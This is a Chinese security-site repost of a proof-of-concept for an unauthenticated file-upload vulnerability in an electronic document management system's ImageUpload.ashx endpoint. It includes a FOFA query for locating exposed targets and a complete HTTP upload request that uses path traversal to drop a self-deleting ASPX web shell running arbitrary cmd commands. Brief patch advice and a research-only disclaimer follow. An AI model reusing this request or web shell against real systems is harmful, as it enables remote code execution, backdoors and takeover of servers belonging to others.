电子资料管理系统 ImageUpload.ashx 任意文件上传漏洞 PoC

admin 2024年12月17日11:10:22评论27 views字数 1895阅读6分19秒阅读模式
00产品简介

电子资料管理系统(Electronic Document Management System,简称EDMS),是一个通过电子设备由人、计算机及其他外围设备等组成的能进行信息的收集、传递、存贮、加工、维护和使用的系统。系统提供集中化的文档存储和管理功能,帮助企业高效组织和管理电子资料。通过数字化索引和分类,员工可以快速查找和访问所需的文件,减少查找文档所需的时间。系统提供多层次的安全功能,如加密、基于角色的访问控制和审计日志,确保只有经过授权的用户才能访问和修改文档,减少数据泄露和不合规的风险。支持团队成员之间的协作,以及与外部利益相关者的共享功能。通过权限管理,安全地与客户或外部利益相关者共享文档。能够轻松管理文档的版本,确保用户安心。旧版本是文件的完整备份,在整个版本中保留统一的元数据。部分系统支持工作流程自动化功能,帮助企业简化操作流程,提高工作效率。

01漏洞概述

电子资料管理系统 /Menu/ImageManger/ImageUpload.ashx 接口存在文件上传漏洞,未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。

02搜索引擎
FOFA:
body="Menu/Login/ThirdLoginHandler.ashx"
电子资料管理系统 ImageUpload.ashx 任意文件上传漏洞 PoC
03漏洞复现

 

POST /Menu/ImageManger/ImageUpload.ashx HTTP/1.1Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryssh7UfnPpGU7BXfKUpgrade-Insecure-Requests: 1Accept-Encoding: gzip------WebKitFormBoundaryssh7UfnPpGU7BXfKContent-Disposition: form-data; name="isUpload"印章图片------WebKitFormBoundaryssh7UfnPpGU7BXfKContent-Disposition: form-data; name="entid"666------WebKitFormBoundaryssh7UfnPpGU7BXfKContent-Disposition: form-data; name="Type"1------WebKitFormBoundaryssh7UfnPpGU7BXfKContent-Disposition: form-data; name="Filedata"; filename="../rce.aspx"Content-Type: text/plain<%@ Page Language="Jscript" validateRequest="false" %><%var c=new System.Diagnostics.ProcessStartInfo("cmd");var e=new System.Diagnostics.Process();var out:System.IO.StreamReader,EI:System.IO.StreamReader;c.UseShellExecute=false;c.RedirectStandardOutput=true;c.RedirectStandardError=true;e.StartInfo=c;c.Arguments="/c " + Request.Item["cmd"];e.Start();out=e.StandardOutput;EI=e.StandardError;e.Close();Response.Write(out.ReadToEnd() + EI.ReadToEnd());System.IO.File.Delete(Request.PhysicalPath);Response.End();%>------WebKitFormBoundaryssh7UfnPpGU7BXfK--
电子资料管理系统 ImageUpload.ashx 任意文件上传漏洞 PoC
电子资料管理系统 ImageUpload.ashx 任意文件上传漏洞 PoC
04检测工具

nuclei

电子资料管理系统 ImageUpload.ashx 任意文件上传漏洞 PoC

afrog

电子资料管理系统 ImageUpload.ashx 任意文件上传漏洞 PoC

xray

电子资料管理系统 ImageUpload.ashx 任意文件上传漏洞 PoC
05
修复建议

1、关闭互联网暴露面或接口设置访问权限

2、打补丁或升级至安全版本

06

原文始发于微信公众号(nday POC):电子资料管理系统 ImageUpload.ashx 任意文件上传漏洞

 

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月17日11:10:22
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   电子资料管理系统 ImageUpload.ashx 任意文件上传漏洞 PoChttps://cn-sec.com/archives/3516605.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息